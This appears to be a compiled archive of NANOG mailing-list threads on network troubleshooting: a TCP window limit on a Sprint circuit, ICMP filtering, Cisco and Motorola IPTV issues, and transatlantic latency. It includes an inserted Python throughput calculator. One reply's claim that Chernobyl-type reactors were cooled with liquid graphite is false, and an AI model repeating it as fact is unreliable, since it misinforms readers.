Re: Bandwidth issues in the Sprint network
Some people wanted to know what I found the problem to be. I have discovered the problem for a fact is the TCP window size on uploads. I have a Linux box that I changed the window sizes to match and I still get 32k on an upload window and 64k on a download window. With a ping time of 50ms I have a max theoretical throughput of 5.2Mbps, which is about what I was getting. The formula to calculate this is the following:

(((Ts/Tw)*Rtd)/1000)+((Ts*8)/(Lr*1000))

Where the following are:
Ts = Transfer size in Bytes
Tw = TCP Window size in Bytes
Rtd = Round trip Delay in milliseconds
Lr = Line rate in bps

At this point I am still trying to locate the offending device that is changing the window size. After I determine for sure whether the problem is with my router, the Sprint network, or another upstream system I will let everybody know what I find.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Monday 07 April 2008, Brian Raaen wrote:
> I am currently having problems getting upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) tests always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else.
>
> --
> Brian Raaen
> Network Engineer
> [EMAIL PROTECTED]
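As an added worked example (not code from the posts above), the window-bound throughput the reply describes, the post's transfer-time formula, and a small diagnostic that works backwards from an observed rate to the window that would explain it. It assumes Lr is in bit/s, so the serialization term is computed as Ts*8/Lr (the post's expression divides by Lr*1000, which only balances if Lr is in kbit/s); the 155 Mbps OC3 line rate and socket-buffer sizes are constructed sample values.

```python
"""Window-limited TCP throughput, as discussed in the thread above.

Added example, not code from the original posts.  A sender can have at most
one receive window of unacknowledged data in flight, so with a window of Tw
bytes and a round-trip delay of Rtd ms the best case for a single flow is
Tw*8/(Rtd/1000) bit/s, no matter how fast the line underneath is.
"""


def window_limited_throughput_bps(window_bytes: int, rtt_ms: float) -> float:
    """Upper bound on throughput for one TCP flow limited only by its window."""
    if window_bytes <= 0 or rtt_ms <= 0:
        raise ValueError("window and RTT must be positive")
    return window_bytes * 8 / (rtt_ms / 1000.0)


def effective_window_bytes(throughput_bps: float, rtt_ms: float) -> float:
    """Inverse of the bound: the window that would explain an observed rate.

    Useful when hunting a device that rewrites the window: if a flow tops out
    well below the line rate, the implied window hints at what it was clamped to.
    """
    return throughput_bps * (rtt_ms / 1000.0) / 8


def transfer_time_s(ts_bytes: int, tw_bytes: int, rtd_ms: float,
                    lr_bps: float) -> float:
    """Transfer time per the post's formula: one RTT per window of data,
    plus serialization of the whole transfer at the line rate.

    Assumption (mine): Lr is in bit/s, so the second term is Ts*8/Lr.
    """
    rtt_term = (ts_bytes / tw_bytes) * rtd_ms / 1000.0
    wire_term = ts_bytes * 8 / lr_bps
    return rtt_term + wire_term


def diagnose(observed_bps: float, rtt_ms: float, line_rate_bps: float,
             slack: float = 0.1) -> str:
    """Classify an underperforming flow.

    If the implied window lands on a common socket-buffer size (constructed
    list below) and the observed rate is far below the line rate, a window
    clamp is the more likely explanation than rate limiting or loss.
    """
    if observed_bps >= line_rate_bps * (1 - slack):
        return "line-rate bound"
    implied = effective_window_bytes(observed_bps, rtt_ms)
    for common in (16384, 32768, 65535, 65536):
        if abs(implied - common) / common <= slack:
            return f"window-bound (~{common} byte window)"
    return "unexplained (rate limiting or loss?)"


if __name__ == "__main__":
    # Values from the thread: 32 KB / 64 KB windows, 50 ms ping, ~5 Mbps seen.
    for win in (32768, 65536):
        print(f"{win} byte window @ 50 ms -> "
              f"{window_limited_throughput_bps(win, 50) / 1e6:.2f} Mbps")
    print("Implied window for 5 Mbps @ 50 ms:",
          effective_window_bytes(5_000_000, 50), "bytes")
    print("100 MB over a 32 KB window, 50 ms RTT, 155 Mbps line:",
          f"{transfer_time_s(100_000_000, 32768, 50, 155_000_000):.1f} s")
    print(diagnose(5_000_000, 50, 155_000_000))
```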
Re: Bandwidth issues in the Sprint network
Currently there is not a proxy server in the network, although when using some of the tests on dslreports.com there is a message about compression being used for the upload and to remove proxy settings. I have also been testing using FTP on a *nix server as well. Both the server and PC are connected to a Cisco 2960 switch in the headend that is connected to the 7200 router. I can transfer ftp at about 80Mbps between the PC and the server, so they are not IO bound. The site I am testing with is an ftp server located in a colo facility that we use and has sufficient bandwidth. This circuit is clean in the sense of not having CRC, framing or other errors, but this is a new circuit and we have never gotten more than 5Mbps out of a single session (flow/ip) across the WAN. I would have to double check the MTU, but it is currently the default.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Monday 07 April 2008, Brian Raaen wrote:
> I am currently having problems getting upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) tests always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else.
>
> --
> Brian Raaen
> Network Engineer
> [EMAIL PROTECTED]
Re: Bandwidth issues in the Sprint network
I have been using the Java based versions of the speed test. At this point I have had some Sprint people get in contact with me so I will see what they find. Thank you to everyone for all your help.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Monday 07 April 2008, you wrote:
> I am currently having problems getting upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) tests always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else.
>
> --
> Brian Raaen
> Network Engineer
> [EMAIL PROTECTED]
Bandwidth issues in the Sprint network
I am currently having problems getting upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) tests always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]
Re: rack power question
Russia (or the USSR at that time) used to use liquid graphite to cool their nuclear reactors, even though it was flammable. Of course that was what they were using in Chernobyl.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Tuesday 25 March 2008, you wrote:
> Dorn Hetzel wrote:
> > Of course, my chemistry is a little rusty, so I'm not sure about the prospects for a non-toxic, non-flammable, non-conductive substance with workable fluid flow and heat transfer properties :)
>
> Mineral oil? I'm not sure about the non-flammable part though. Not all oils burn but I'm not sure if mineral oil is one of them. It is used for immersion cooling though.
>
> Justin
Re: Transition Planning for IPv6 as mandated by the US Govt
No, and no. Shouldn't be a surprise. (All is the dealbreaker; certain agencies are on the ball, but most are barely experimenting.)

On Sat, 15 Mar 2008, Glen Kent wrote:
> Hi,
>
> I was just reading http://www.whitehouse.gov/omb/egov/b-1-information.html#IPV6, released some time back in 2005, and it seems that the US Govt. had set the target date of 30th June 2008 for all federal govt agencies to move their network backbones to IPv6. This deadline is almost here. Are we any closer to this transition?
>
> I have another related question:
>
> Do all ISPs at least support tunneling the IPv6 pkts to some end point? For example, is there a way for an IPv6 enthusiast to send his IPv6 packet from his laptop to a remote IPv6 server in the current circumstances if his ISP does not actively support native IPv6?
>
> Cheers,
> Glen
Re: How Not to Multihome
On Mon, 8 Oct 2007, Patrick W. Gilmore wrote:
> To be clear, I am not suggesting de-aggregating every CIDR down to /24s. But the global table doesn't grow any more whether the customer announces the /24 from their own ASN, or if you multi-originate it from two upstreams - or just one upstream for that matter. So there is no legitimate reason to _not_ announce it, but there is a reason to announce it.

Bingo. And, I'd hazard to guess that many readers of this thread have broken more than a single unwritten rule. I recall being chastised relentlessly years back for doing iBGP over a GRE tunnel as I saved up for a real trunk. Guess what - it worked wonders in the short term (though I'll admit I'm embarrassed to rehash it). Bottom line (getting back to the original question) is yes, it's ok, so long as you handle due diligence with the owner of the CIDR space. RFC, no; courtesy among peers, yup.

cheers,
brian
RE: Level3 or Broadwing or other issues in Dallas ?
Same thing in Chicago.

Brian Knoll

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Ross Vandegrift
Sent: Wednesday, September 19, 2007 12:34 PM
To: W. Kevin Hunt
Cc: nanog@merit.edu
Subject: Re: Level3 or Broadwing or other issues in Dallas ?

On Wed, Sep 19, 2007 at 12:25:53PM -0500, W. Kevin Hunt wrote:
> I'm in Louisiana and just lost my OC12 to Bwing/L3. Circuit didn't die, actually received a BGP message to terminate the session. Anyone else seeing anything or got an update? ALL the numbers I have to L3 are busy...

Seeing the same exact thing in Newark, DE.

Ross
RE: Using Mobile Phone email addys for monitoring
Is it flawed? It depends on your business requirements. If seconds, milliseconds, or even microseconds matter to your mission critical apps (think real-time trading networks) then you would want a 24x7 staffed NOC using an enterprise monitoring system - something like Openview. You wouldn't want to rely on anything that sends emails.

Brian Knoll

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Rick Kunkel
Sent: Thursday, September 06, 2007 3:46 PM
To: nanog@merit.edu
Subject: Using Mobile Phone email addys for monitoring

Hello folks,

First off, apologies if this is off topic. I'm hoping that system and network monitoring tips are enough of a common issue that this falls under the group's charter.

We've traditionally used mobile phone email addresses for system notifications, but over the past 6-12 months, it seems to have become increasingly sketchy. For instance, if an application fails to contact a certain service on a certain server, it sends an email (through its own SMTP service, to avoid a chicken-and-egg prob if/when our main SMTP service fails) to [EMAIL PROTECTED] (Obviously, that was a fake number.)

More and more, I'm getting less and less of these notifications. It seems especially prevalent when MANY things are sent at once; if, for example, a central piece fails, and dependent pieces suddenly fail as well. I try to telnet to mailx.tmomail.net port 25 and get sometimes good, sometimes laggy, and sometimes no response. T-Mobile, support levels all the way up to 3, tell me that it's not them, and everything should work wonderfully.

Is SMTP to a mobile phone a fundamentally flawed way to do this? Anyone else have any issues, past or present, with this kind of thing?

Thanks,
Rick Kunkel
Re: Using Mobile Phone email addys for monitoring
> Some mobile phones you can talk to via AT commandset, either via USB cable or something else. (eg: I have used a Nokia 6230 with usb cable.. you can also use bluetooth). If you pay $5 or whatnot for unlimited SMS on an el-cheapo plan, it might work better than using the SMTP gateway (when tied to Nagios, etc..) as you can send SMS messages with the AT commandset.
>
> Assuming, for the moment, that there's a cell signal available in your data center... Not always the case, unfortunately.

I recall a datacenter in BOS that went so far as to nearly eliminate RF using corrugated aluminum inside the walls (you know who you are :)

The simple answer is that it depends on how critical such notifications are. Address it as you would your upstream connectivity, and make it as redundant as is justified. For my meager purposes, SMTP is usually fine. For truly critical issues, my NMS will use a dedicated phone line to dial a handful of on-call techs, with no more info than caller-id. If that id shows up on their phones, immediate investigation is needed. It's embarrassingly primitive, but it's never failed.

Cheers,
Brian
ICMP being dropped between Global Crossings and Onvoy
I have a network (AS33234) I am trying to support that is downstream from Onvoy on one of their connections. Our monitoring equipment is located in AS4452. Our monitoring system is not able to ping their network through Onvoy. The block seems to be happening at either Global Crossings or Onvoy. We are able to reach them using any protocol other than an ICMP ping (we are able to traceroute). Does anyone else know about or see a similar block going on? I have attached part of a traceroute.

 2 suwC6.gig3-1-4.qualitytech.com (216.154.207.145) [AS 20141] 0 msec 0 msec 4 msec
 3 suw04-gig1-0-0.qualitytech.com (216.154.207.173) [AS 20141] 0 msec 0 msec 0 msec
 4 gig6-2.suwangaeq01w.cr.deltacom.net (66.35.174.165) [AS 6983] 4 msec 0 msec 0 msec
 5 * * *
 6 pos5-0.atlngapk22w.cr.deltacom.net (66.35.174.101) [AS 6983] 0 msec 4 msec 0 msec
 7 so-0-0-0.ar3.DAL1.gblx.net (64.208.169.141) [AS 3549] 4 msec 4 msec 4 msec
 8 so1-0-0-622M.ar2.MIN1.gblx.net (67.17.71.34) [AS 3549] 44 msec 44 msec 44 msec
 9 WBS-CONNECT-LLC-Minneapolis.ge-2-3-0.409.ar2.MIN1.gblx.net (64.215.81.82) [AS 3549] 44 msec 44 msec 44 msec
10 * * *
11 * * *
12 WikstromTel-7003.onvoy.net (137.192.32.30) [AS 5006] 52 msec 52 msec 56 msec

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]
Re: Network Inventory Tool
I have not tried it, but this looks promising.

http://metanav.uninett.no/
http://en.wikipedia.org/wiki/Network_Administration_Visualized

Hope this helps

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Monday 13 August 2007 23:31, Wguisa71 wrote:
> Guys,
>
> Does anyone know some tool for network documentation with:
> - inventory (cards, serial numbers, manufacturer...)
> - documentation (configurations, software version control, etc)
> - topology building (L2, L3.. connections, layer control, ...)
>
> All-in-one solution and it doesn't need to be free. I'm just looking for something to control the equipment we have like routers from some sort of suppliers, etc...
>
> Marcio
Re: Problems with either Cisco.com or ATT?
I get the same thing in Atlanta. I can't pull up their site and it looks like my trace dies the same place as yours.

[EMAIL PROTECTED]:~$ traceroute www.cisco.com
traceroute to www.cisco.com (198.133.219.25), 30 hops max, 40 byte packets
 1 gw_alpha.america.net (69.60.176.65) 1.618 ms 1.499 ms 1.559 ms
 2 69.60.176.21 (69.60.176.21) 9.625 ms 9.461 ms 9.439 ms
 3 gwF20.Edelta.america.net (69.60.160.1) 9.260 ms 9.113 ms 9.392 ms
 4 66.0.192.194 (66.0.192.194) 16.189 ms 9.219 ms 9.234 ms
 5 suwC6.gig3-1-4.qualitytech.com (216.154.207.145) 13.064 ms 9.316 ms 10.029 ms
 6 suw04-gig1-0-0.qualitytech.com (216.154.207.173) 41.053 ms 9.432 ms 9.315 ms
 7 gig5-1.suwangaeq00w.xr.deltacom.net (66.35.174.125) 34.815 ms 9.871 ms 25.280 ms
 8 pos5-0.atlngapk22w.cr.deltacom.net (66.35.174.101) 19.050 ms 40.288 ms 13.137 ms
 9 pos1-0.brhmalwd6aw.cr.deltacom.net (66.35.174.13) 17.860 ms 15.823 ms 15.881 ms
10 12.117.136.41 (12.117.136.41) 22.890 ms 18.614 ms 19.742 ms
11 tbr2.attga.ip.att.net (12.123.20.14) 76.260 ms 75.531 ms 75.004 ms
12 tbr1.dlstx.ip.att.net (12.122.2.89) 70.993 ms 70.863 ms 71.373 ms
13 tbr1.la2ca.ip.att.net (12.122.10.50) 74.889 ms 75.098 ms 74.921 ms
14 gar1.sj2ca.ip.att.net (12.122.2.249) 73.098 ms 72.969 ms 72.849 ms
15 * *

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Wednesday 08 August 2007 14:17, Paul Ferguson wrote:
> No idea -- maybe just a hiccup?
>
> From my office in San Jose:
>
> %traceroute www.cisco.com
> Tracing route to www.cisco.com [198.133.219.25] over a maximum of 30 hops:
> [snip]
>  7 3 ms 3 ms 3 ms so-3-0-0.mpr2.sjc7.us.above.net [64.125.30.173]
>  8 3 ms 3 ms 3 ms above-att.sjc7.us.above.net [64.125.13.50]
>  9 7 ms 7 ms 7 ms tbr1.sffca.ip.att.net [12.123.12.2]
> 10 6 ms 6 ms 6 ms gbr5.sffca.ip.att.net [12.122.11.74]
> 11 6 ms 6 ms 6 ms gar1.sj2ca.ip.att.net [12.122.2.253]
> 12 * * * Request timed out.
> 13 * * * Request timed out.
> 14 * ^C
>
> From MIT:
>
> Tracing to: www.cisco.com
>  1 legacy26-0.default.csail.mit.edu (18.26.0.1) [AS3] 0 ms 0 ms 0 ms
>  2 kalgan.trantor.csail.mit.edu (128.30.0.245) [AS40] 0 ms 0 ms 0 ms
>  3 B24-RTR-2-CSAIL.MIT.EDU (18.4.7.1) [AS3] 0 ms 0 ms 0 ms
>  4 EXTERNAL-RTR-1-BACKBONE.MIT.EDU (18.168.0.18) [AS3] 1 ms 4 ms 2 ms
>  5 ge-6-23.car2.Boston1.Level3.net (4.79.2.1) [AS3356] 0 ms * 0 ms
>  6 * * ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) [AS3356] 8 ms
>  7 ae-61-61.csw1.NewYork1.Level3.net (4.69.134.66) [AS3356] 10 ms 5 ms 16 ms
>  8 ae-13-69.car3.NewYork1.Level3.net (4.68.16.5) [AS3356] 67 ms 59 ms 58 ms
>  9 att-level3-oc192.NewYork1.Level3.net (4.68.127.150) [AS3356] 17 ms 127 ms 12 ms
> 10 tbr1.n54ny.ip.att.net (12.123.3.57) [] [MPLS: Label 31537 Exp 0] 80 ms 79 ms 79 ms
> 11 12.122.16.153 (12.122.16.153) [] [MPLS: Label 19 Exp 0] 76 ms 77 ms 77 ms
> 12 cr1.cgcil.ip.att.net (12.122.1.190) [] [MPLS: Label 1188 Exp 0] 77 ms 76 ms 77 ms
> 13 12.122.17.146 (12.122.17.146) [] [MPLS: Label 31051 Exp 0] 77 ms 78 ms 78 ms
> 14 tbr1.sffca.ip.att.net (12.122.10.6) [] [MPLS: Label 31320 Exp 0] 78 ms 78 ms 78 ms
> 15 gbr5.sffca.ip.att.net (12.122.11.74) [] [MPLS: Label 323 Exp 0] 72 ms 71 ms 71 ms
> 16 gar1.sj2ca.ip.att.net (12.122.2.253) [] 76 ms 76 ms 77 ms
> 17 * * *
> 18 * * *
> 19 * * *
> 20 * * *
>
> - ferg
>
> --
> Fergie, a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawg(at)netzero.net
> ferg's tech blog: http://fergdawg.blogspot.com/
Re: Problems getting Cisco router and Motorola Nextlevel system to work together
This router has a G-1 engine with 512 DRAM. I would stop using IRB, but it appears that the way that Motorola has implemented PVCs is very difficult to work around. The Motorola middleware is dynamically assigning the PVC. Yes... I have personally seen a CPE device change its VCI after a period of time. The device did not change ports or anything else but was provisioned to a different VCI after just sitting there. Thanks for the suggestions so far.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Tuesday 24 July 2007 16:25, you wrote:
> > The router is currently configured to use IRB which is a hybrid process. The problem is that the IRB process is overloaded and is dropping traffic faster than it can process it.
>
> Which NPE is in this router? Basically, the 7200 has underpowered CPUs and if you force it to process switch, then it handles a LOT LESS packets per second than you might think. I expect that your config is forcing process switching rather than fast switching. The only three solutions are
> A) run less traffic through the 7200 so that process switching can cope
> B) stop using the feature that forces process switching
> C) replace the 7200 with a 7300 which will probably not have CPU issues.
> However, not knowing the specifics of what IRB is doing, I would advise you to test a replacement platform before committing to it.
>
> Oh well, maybe 4 solutions. If you are using a weak NPE such as NPE-200 you may be able to get some joy by upgrading to a more powerful one. For instance an NPE-400 should handle roughly twice the load of an NPE-200.
>
> --Michael Dillon
Re: Problems getting Cisco router and Motorola Nextlevel system to work together
The buffers are overloading and dropping traffic. With a Cisco TAC case, the tech had me increase the buffers so much it wasn't even funny. The only problem was about an hour after we tried to tune the buffers, things got very bad and I had to clear them to default to stop a very ugly bigger outage. This system does indeed involve IPTV set top boxes. I am unable to use RBE since the PVC provisioning may change on the units and the VC would not match what the DHCP lease was originally on. The way that this Motorola system implements PVCs baffles me; it does not make any sense to me. They are dynamically changing the VCI, assigning it out of a pool, just like DHCP does with IPs. The circuits are not SVCs and the endpoint router is seeing things change, so this is not SPVCs either. I am trying to think of a way to change this to work with RBE switching, but the dynamic PVCs are throwing a monkey wrench into things. Thanks for the help.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]

On Tuesday 24 July 2007 22:58, you wrote:
> We should probably move this over to cisco-nsp. I'd be interested to see a 'sh buffers' because if it's process switching that much data I bet the buffers are thrashing. I seem to remember working on something very similar to that 4 or 5 years ago when a customer had bridging over a bunch of ATM PVCs and they told me it was some type of IPTV set top box. We tuned the buffers really high so they didn't trim back and it worked. We also do some bridging under interrupt without process switching too last time I checked, so some more data would be helpful. Move it over to [EMAIL PROTECTED] and we can help more on the Cisco side if you want.
>
> Rodney
>
> On Tue, Jul 24, 2007 at 09:25:49PM +0100, [EMAIL PROTECTED] wrote:
> > > The router is currently configured to use IRB which is a hybrid process. The problem is that the IRB process is overloaded and is dropping traffic faster than it can process it.
> >
> > Which NPE is in this router? Basically, the 7200 has underpowered CPUs and if you force it to process switch, then it handles a LOT LESS packets per second than you might think. I expect that your config is forcing process switching rather than fast switching. The only three solutions are
> > A) run less traffic through the 7200 so that process switching can cope
> > B) stop using the feature that forces process switching
> > C) replace the 7200 with a 7300 which will probably not have CPU issues.
> > However, not knowing the specifics of what IRB is doing, I would advise you to test a replacement platform before committing to it.
> >
> > Oh well, maybe 4 solutions. If you are using a weak NPE such as NPE-200 you may be able to get some joy by upgrading to a more powerful one. For instance an NPE-400 should handle roughly twice the load of an NPE-200.
> >
> > --Michael Dillon
Where did freeipdb IP utility site go?
I was trying to investigate some of the IP management tools and followed the link www.freeipdb.org and was more than a little upset with what I found. This domain name apparently has been taken by a porn site that is wanting to auction it off. Does anyone know if the project died or if it changed domain names? I have removed the reference to it in the wiki page, but there are other references to the site on the NANOG site. I am not sure who will need to remove the links, but they no longer point to an IP management tool. If the utility still exists I would be interested in finding it, as I was not able to dig it up on a quick Google search.

--
Brian Raaen
Network Engineer
[EMAIL PROTECTED]
Problems getting Cisco router and Motorola Nextlevel system to work together
I am having some difficulties involving using a Cisco 7200 router to terminate ATM sessions from a Motorola Nextlevel IPTV system. The router is currently configured to use IRB which is a hybrid process. The problem is that the IRB process is overloaded and is dropping traffic faster than it can process it. I opened a case with Cisco TAC, and they recommended using RBE instead of IRB. While I have been trying to plan migrating the system to RBE I discovered that Motorola uses a concept called dynamic PVCs to assign the PVCs to the CPE devices (an IPTV unit that has a data port). The device uses two PVCs, one for data and one for IPTV. The system dynamically assigns the PVCs when the CPE device connects. This looks like it would not work with RBE, since the PVC can change before the DHCP lease expires. Having this router dropping traffic has been causing severe problems for end users and is causing an ongoing system outage. I am currently trying to work with both Motorola and Cisco, however both vendors are blaming the problem on the other vendor. I am not sure what to do. Motorola says their system only works with IRB and Cisco says the router will not function with this size network using IRB. Has anyone else arrived at a working solution using a Cisco 7200 router to terminate a Motorola Nextlevel system supporting approximately 2000-3000 end users? I would be extremely grateful if anyone who has worked with this type of system could help shed some light on this problem. Thank you in advance.

--
Brian Raaen
Network Engineer
braaen (at) zcorum (dot) com
RE: TCP congestion
In order to solve this, you need to see a trace from both sides of the WAN. Which side is your trace from? Can you see the original ACK on both ends? If the receiver is sending a DUP ACK, then the sender either never received the first ACK or it didn't receive it within the timeframe it expected.

Brian

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Philip Lavine
Sent: Thursday, July 12, 2007 1:07 PM
To: nanog
Subject: TCP congestion

Can someone explain how a TCP conversation could degenerate into congestion avoidance on a long fat pipe if there is no packet/segment loss or out of order segments?

Here is the situation:
WAN = 9 Mbps ATM connection between NY and LA (70 ms delay)
LAN = Gig Ethernet
Receiver: LA server = Win2k3
Sender: NY server = Linux 2.4
Data transmission typical = bursty but never more than 50% of CIR
Segment sizes = 64k to 1460k but mostly less than 100k

Typical Problem Scenario:
Data transmission is humming along consistently at 2 Mbps, all of a sudden transmission rates drop to nothing then pick up again after 15-20 seconds. Prior to the drop off (based on packet capture) there is usually a DUP ACK/SACK coming from the receiver followed by the Retransmits and congestion avoidance. What is strange is there is nothing prior to the drop off that would be an impetus for congestion (no high BW utilization or packet loss).

Also are there any known TCP issues between the linux 2.4 kernel and windows 2003 SP1? Mainly, are there issues regarding the handling of SACK, DUP ACKs and Fast Retransmits?

Of course we all know that this is not an application issue since developers make flawless socket code, but if it is a network issue how is it caused?

Philip
RE: TCP congestion
Are you using TCP offloading on your windows box? I have seen issues with that in the past where it was dropping data. Turn it off and see if the issue goes away. Are the other connections traversing this path seeing the same issues? Still - the only definitive way to solve the problem is by getting captures from both ends. If you can isolate your WAN with taps on each side and see packets being dropped, you know it's your ATM circuit. QoS will not help you if you aren't exceeding bandwidth.

Thanks,

Brian Knoll
Senior Network Engineer, TTNET
312-698-6017 desk
312-823-0957 mobile

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Philip Lavine
Sent: Thursday, July 12, 2007 3:28 PM
To: Stephen Wilcox
Cc: nanog
Subject: Re: TCP congestion

I just don't understand how if there is 1 segment that gets lost this could translate to such a catastrophic long period of slow-start. How can I minimize the impact of the inevitable segment loss/out of order over a WAN? Is QoS the only option?

- Original Message -
From: Stephen Wilcox [EMAIL PROTECTED]
To: Philip Lavine [EMAIL PROTECTED]
Cc: nanog nanog@merit.edu
Sent: Thursday, July 12, 2007 1:09:24 PM
Subject: Re: TCP congestion

Well, if it's out of order it's the same as if it's lost or delayed, it needs to see that missing segment before the window is full.

As mentioned you need to get dumps from both ends, you will almost definitely find that you have packet loss which tripped tcp's slow start mechanism.

Steve

On Thu, Jul 12, 2007 at 12:02:49PM -0700, Philip Lavine wrote:
> Even if the segment was received out of order what would cause congestion avoidance to starve the connection of legitimate traffic for 15 to 20 seconds? That is the core of the problem.
>
> - Original Message -
> From: Fred Baker [EMAIL PROTECTED]
> To: Brian Knoll [EMAIL PROTECTED]
> Cc: Philip Lavine [EMAIL PROTECTED]; nanog nanog@merit.edu
> Sent: Thursday, July 12, 2007 11:56:06 AM
> Subject: Re: TCP congestion
>
> On Jul 12, 2007, at 11:42 AM, Brian Knoll ((TTNET)) wrote:
> > If the receiver is sending a DUP ACK, then the sender either never received the first ACK or it didn't receive it within the timeframe it expected.
>
> or received it out of order. Yes, a tcpdump trace is the first step.
RE: trans-Atlantic latency?
A reasonable latency to expect between Chicago and London would be 92ms RTT.

Brian Knoll

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Neal R
Sent: Thursday, June 28, 2007 6:21 PM
To: nanog@merit.edu
Subject: trans-Atlantic latency?

I have a customer with IP transport from Sprint and McLeod and fiber connectivity to Sprint in the Chicago area. The person making the decisions is not a routing guy but is very sharp overall. He is currently examining the latency on trans-Atlantic links and has fixed on the idea that he needs 40ms or less to London through whatever carrier he picks. He has spoken to someone at Cogent about a point to point link.

What is a reasonable latency to see on a link of that distance? I get the impression he is shopping for something that involves dilithium crystal powered negative latency inducers, wormhole technology, or an ethernet to tachyon bridge, but it's been a long time (9/14/2001, to be exact) since I've had a trans-Atlantic circuit under my care and things were different back then.

Anyone care to enlighten me on what these guys can reasonably expect on such a link? My best guess is he'd like service from Colt based on the type of customer he is trying to reach, but it's a big muddle and I don't get to talk to all of the players ...
Re: NOC Personel Question (Possibly OT)
Todd Christell wrote:
> Greetings,
>
> Sorry if this is OT but we are having a discussion with our HR department. We are in the process of getting a 24 X 7 NOC in place and HR has a problem with calling them NOC Specialist. What is the generally accepted title?
>
> Thanks in advance,
>
> Todd Christell
> SpringNet Network Manager
> 417.831.8688

At a previous employer, L1 nocsters were network technicians, L2 people were network analysts. Then above them were system and network engineers, and above them system and network architects.

Brian
Re: FCC on wifi at hotel
Brandon Galbraith wrote:
> On 2/28/07, Steve Meuse [EMAIL PROTECTED] wrote:
> On 2/28/07, Jared Mauch [EMAIL PROTECTED] wrote:
>
> http://hraunfoss.fcc.gov/edocs_public/attachmatch/FCC-06-157A1.pdf
>
> I do suggest reading this. They can not legally bar you from using the devices.
>
> They can charge you outrageous fees to get to/from the MMR or telco demarc and make it prohibitively expensive. Right, a wifi that goes nowhere isn't terribly useful :)
>
> You could always get to upstream via wireless.
>
> -brandon

a small number of wifi users with a card in a laptop to get to cellular broadband, it'd be pretty easy..

Brian
Re: what the heck do i do now?
On Wed, 31 Jan 2007, Barry Shein wrote:
> One problem we have is that we tend to see the internet as a perfect simulation of a fair and just system, at least as a first goal.
>
> I don't know if that's possible or not. I don't know if anyone has actually explored the issue deeply. One problem is that there are many different notions of justice present globally. Probably thousands with significant real-world referents.

Ultimately, the problem is that the idealism which was more or less the rule a decade ago has taken a backseat to commercialism and what some see as practicality; and arguably, some consider such a reasonable excuse for lax maintenance (to the tune of "if it's not hurting me/my customers, it's not a priority"). Considering the time passed since maps went defunct, Paul is entirely justified in doing whatever is necessary to cluebat the offending networks, imho.
Re: Undersea fiber cut after Taiwan earthquake - PCCW / Singtel / KT e tc connectivity disrupted
That's news? The same still happens with much land-based sonet, where diverse paths still share the same entrance to a given facility. Unless each end can negotiate cost sharing for diverse paths, or unless the owner of the fiber can cost justify the same, chances are you're not going to see the ideal. Money will always speak louder than idealism. Undersea paths complicate this even further. On Sun, 21 Jan 2007, Rod Beck wrote: :What's really interesting is the fragility of the existing telecom infrastructure. These six cables were apparently very close to each other in the water. In other words, despite all the preaching about physical diversity, it was ignored in practice. Indeed, undersea cables very often use the same conduits for terrestrial backhaul since it is the most cost effective solution. However, that means that diversifying across undersea cables does not buy the sort of physical diversity that is anticipated. : :Roderick S. Beck :EMEA and North American Sales :Hibernia Atlantic
RE: decline of customer service
